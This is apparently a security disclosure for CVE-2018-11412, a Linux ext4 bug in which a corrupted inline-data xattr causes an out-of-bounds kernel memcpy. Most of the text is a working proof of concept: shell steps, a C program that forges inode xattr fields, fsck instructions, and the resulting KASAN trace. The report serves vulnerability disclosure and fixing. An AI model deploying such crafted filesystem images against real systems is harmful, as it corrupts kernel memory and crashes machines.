ext4 can store data for small regular files as "inline data", meaning that the data is stored inside the corresponding inode instead of in separate blocks. Inline data is stored in two places: The first 60 bytes go in the i_block field in the inode (which normally contains a list of blocks instead), the rest goes in the special filesystem-internal extended attribute "system.data". Since commit e50e5129f384 ("ext4: xattr-in-inode support", in v4.13+), ext4 can store extended attribute values not only inline in the inode, but can also store such values in dedicated inodes. When a corrupted filesystem stores the system.data extended attribute value in a dedicated inode, the kernel gets confused, causing memory corruption. ext4_find_inline_data_nolock() attempts to locate an inode's inline data by searching for the system.data xattr using ext4_xattr_ibody_find(). If the inode has xattrs, ext4_xattr_ibody_find() first checks them for corruption using xattr_check_inode(), then grabs the wanted xattr using xattr_find_entry(). xattr_check_inode() uses ext4_xattr_check_entries() to check the individual xattrs, but skips most checks if `entry->e_value_inum != 0` (marking an xattr whose value is in a dedicated inode) - only for inline values, length and offset checks are performed to ensure that the value actually fits into the inode. The problem is that ext4_find_inline_data_nolock() then assumes that the returned xattr uses inline storage and that the returned length will fit into the inode; it stores the length field from the xattr in `EXT4_I(inode)->i_inline_size` without further checks. Later, when the file is read, ext4_read_inline_data() trusts this length value, causing an out-of-bounds memcpy() in the following line: memcpy(buffer, (void *)IFIRST(header) + le16_to_cpu(entry->e_value_offs), len); To reproduce, on a system with kernel v4.13 or newer, ideally with KASAN on: 1. Create a new ext4 filesystem image, with 256-byte inodes and inline data support: $ mkfs.ext4 -b 4096 -I 256 -O inline_data testfs.img 400k mke2fs 1.43.7 (16-Oct-2017) Creating regular file testfs.img Filesystem too small for a journal Creating filesystem with 100 4k blocks and 64 inodes Allocating group tables: done Writing inode tables: done Writing superblocks and filesystem accounting information: done 2. Create a 75-byte file in the new filesystem: $ mkdir mount $ sudo mount testfs.img mount $ sudo dd bs=75 count=1 if=/dev/zero of=mount/testfile 1+0 records in 1+0 records out 75 bytes copied, 0.000811554 s, 92.4 kB/s $ sudo umount mount 3. Bump up the inode size, bump up the xattr size, and mark the xattr value as non-inline: $ cat fixup.c #include <stdint.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/stat.h> #define __le16 uint16_t #define __le32 uint32_t #define __u16 uint16_t #define __u32 uint32_t #define __u8 uint8_t /* some definitions from kernel headers */ #define EXT4_NDIR_BLOCKS 12 #define EXT4_IND_BLOCK EXT4_NDIR_BLOCKS #define EXT4_DIND_BLOCK (EXT4_IND_BLOCK + 1) #define EXT4_TIND_BLOCK (EXT4_DIND_BLOCK + 1) #define EXT4_N_BLOCKS (EXT4_TIND_BLOCK + 1) #define EXT4_XATTR_MAGIC 0xEA020000 struct ext4_inode { __le16 i_mode; __le16 i_uid; __le32 i_size_lo; __le32 i_atime; __le32 i_ctime; __le32 i_mtime; __le32 i_dtime; __le16 i_gid; __le16 i_links_count; __le32 i_blocks_lo; __le32 i_flags; union { struct { __le32 l_i_version; } linux1; } osd1; __le32 i_block[EXT4_N_BLOCKS]; __le32 i_generation; __le32 i_file_acl_lo; __le32 i_size_high; __le32 i_obso_faddr; union { struct { __le16 l_i_blocks_high; __le16 l_i_file_acl_high; __le16 l_i_uid_high; __le16 l_i_gid_high; __le16 l_i_checksum_lo; __le16 l_i_reserved; } linux2; } osd2; __le16 i_extra_isize; __le16 i_checksum_hi; __le32 i_ctime_extra; __le32 i_mtime_extra; __le32 i_atime_extra; __le32 i_crtime; __le32 i_crtime_extra; __le32 i_version_hi; __le32 i_projid; }; struct ext4_xattr_ibody_header { __le32 h_magic; }; struct ext4_xattr_entry { __u8 e_name_len; __u8 e_name_index; __le16 e_value_offs; __le32 e_value_inum; __le32 e_value_size; __le32 e_hash; char e_name[0]; }; #define INODE_SIZE 256 #define ROUND_UP(x,round) ( ((x)+((round)-1)) & ~((round)-1) ) int main(int argc, char **argv) { char *path = argv[1]; int fd = open(path, O_RDWR); if (fd == -1) err(1, "open"); struct stat st; if (fstat(fd, &st)) err(1, "fstat"); char *map = mmap(NULL, st.st_size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (map == MAP_FAILED) err(1, "mmap"); for (int i=0; i<st.st_size/INODE_SIZE; i++) { struct ext4_inode *ino = (void*)(map + i * INODE_SIZE); if (ino->i_links_count != 1 || ino->i_size_lo != 75) continue; printf("found inode (idx=%d, size=%u, mode=%ho)\n", i, ino->i_size_lo, ino->i_mode); ino->i_size_lo = 60000; printf(" i_extra_isize = %hu\n", ino->i_extra_isize); struct ext4_xattr_ibody_header *hdr = (void*)( ((char*)ino)+128+ino->i_extra_isize ); if (hdr->h_magic != EXT4_XATTR_MAGIC) continue; struct ext4_xattr_entry *entry = (void*)(hdr+1); while (*(uint32_t*)entry != 0) { printf(" attr: idx=%hhu name='%*s' offs=%hu inum=%u size=%u\n", entry->e_name_index, entry->e_name_len, entry->e_name, entry->e_value_offs, entry->e_value_inum, entry->e_value_size); entry->e_value_offs = 0; entry->e_value_inum = 20; entry->e_value_size = 60000; entry = (void*)( (char*)entry + sizeof(*entry) + ROUND_UP(entry->e_name_len, 4) ); } } } $ gcc -o fixup fixup.c -Wall $ ./fixup testfs.img found inode (idx=555, size=75, mode=100644) i_extra_isize = 32 attr: idx=7 name='data' offs=76 inum=0 size=15 4. Use fsck to fix up the inode checksum (but don't let it fix anything else!): $ fsck.ext4 -f testfs.img e2fsck 1.43.7 (16-Oct-2017) Pass 1: Checking inodes, blocks, and sizes Inode 12 has INLINE_DATA_FL flag but extended attribute not found. Truncate<y>? no Extended attribute in inode 12 has a value size (60000) which is invalid Clear<y>? no Inode 12 passes checks, but checksum does not match inode. Fix<y>? yes Pass 2: Checking directory structure Pass 3: Checking directory connectivity Pass 4: Checking reference counts Pass 5: Checking group summary information testfs.img: ***** FILE SYSTEM WAS MODIFIED ***** testfs.img: ********** WARNING: Filesystem still has errors ********** testfs.img: 12/64 files (0.0% non-contiguous), 13/100 blocks 5. Mount the filesystem again: $ sudo mount testfs.img mount 6. Read the file: $ hexdump -C mount/testfile 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 00000030 00 00 00 00 00 00 00 00 00 00 00 00 04 07 00 00 |................| 00000040 14 00 00 00 60 ea 00 00 00 00 00 00 64 61 74 61 |....`.......data| 00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000004a0 31 00 00 00 00 00 00 00 e0 d1 fc 98 d7 7f 00 00 |1...............| 000004b0 e0 07 03 99 d7 7f 00 00 00 00 00 00 00 00 00 00 |................| 000004c0 00 00 00 00 00 00 00 00 e0 5f 00 00 00 00 00 00 |........._......| 000004d0 64 00 00 00 00 00 00 00 f0 af 02 99 d7 7f 00 00 |d...............| 000004e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| [...] 7. Check dmesg: $ dmesg [...] [ 3211.552729] ================================================================== [ 3211.552782] BUG: KASAN: use-after-free in ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552787] Write of size 59940 at addr ffff8802ba1d003c by task pool/12922 [ 3211.552796] CPU: 3 PID: 12922 Comm: pool Not tainted 4.17.0-rc4+ #7 [ 3211.552798] Hardware name: LENOVO 20FCS12V06/20FCS12V06, BIOS N1FET43W (1.17 ) 08/02/2016 [ 3211.552799] Call Trace: [ 3211.552807] dump_stack+0x71/0xab [ 3211.552813] print_address_description+0x6a/0x250 [ 3211.552817] kasan_report+0x258/0x380 [ 3211.552863] ? ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552867] memcpy+0x34/0x50 [ 3211.552914] ext4_read_inline_data+0x114/0x120 [ext4] [ 3211.552961] ext4_read_inline_page+0x1e4/0x2a0 [ext4] [ 3211.553006] ? ext4_read_inline_data+0x120/0x120 [ext4] [ 3211.553053] ext4_readpage_inline+0x13e/0x160 [ext4] [ 3211.553101] ext4_readpage+0xf5/0x110 [ext4] [ 3211.553106] generic_file_read_iter+0x9a4/0xea0 [ 3211.553112] ? filemap_range_has_page+0x160/0x160 [ 3211.553116] ? save_stack+0x89/0xb0 [ 3211.553120] ? __kasan_slab_free+0x105/0x150 [ 3211.553124] ? aa_path_link+0x1f0/0x1f0 [ 3211.553128] ? do_syscall_64+0x150/0x160 [ 3211.553132] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553137] ? audit_watch_compare+0x1b/0x50 [ 3211.553142] __vfs_read+0x239/0x340 [ 3211.553145] ? __x64_sys_copy_file_range+0x2d0/0x2d0 [ 3211.553149] ? dput.part.19+0x2e/0x1b0 [ 3211.553154] ? auditd_test_task+0x43/0x60 [ 3211.553158] vfs_read+0xa5/0x190 [ 3211.553162] ksys_read+0xa1/0x120 [ 3211.553166] ? kernel_write+0xa0/0xa0 [ 3211.553171] do_syscall_64+0x6d/0x160 [ 3211.553175] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 3211.553178] RIP: 0033:0x7f9ada1af72c [ 3211.553180] RSP: 002b:00007f9ac2258888 EFLAGS: 00000246 ORIG_RAX: 0000000000000000 [...] [ 3211.553197] The buggy address belongs to the page: [ 3211.553202] page:ffffea000ae87400 count:2 mapcount:0 mapping:ffff88021fe57898 index:0x0 [ 3211.553207] flags: 0x17fffc000000021(locked|lru) [ 3211.553213] raw: 017fffc000000021 ffff88021fe57898 0000000000000000 00000002ffffffff [ 3211.553219] raw: ffffea000858fc20 ffff8803d0a204a0 0000000000000000 ffff8803cf31cac0 [ 3211.553222] page dumped because: kasan: bad access detected [ 3211.553224] page->mem_cgroup:ffff8803cf31cac0 [ 3211.553229] Memory state around the buggy address: [ 3211.553234] ffff8802ba1d0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553238] ffff8802ba1d0f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 3211.553243] >ffff8802ba1d1000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553246] ^ [ 3211.553250] ffff8802ba1d1080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553254] ffff8802ba1d1100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 3211.553257] ================================================================== Occasionally this will also cause unrelated userspace processes to segfault.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11412 was assigned for this issue by MITRE.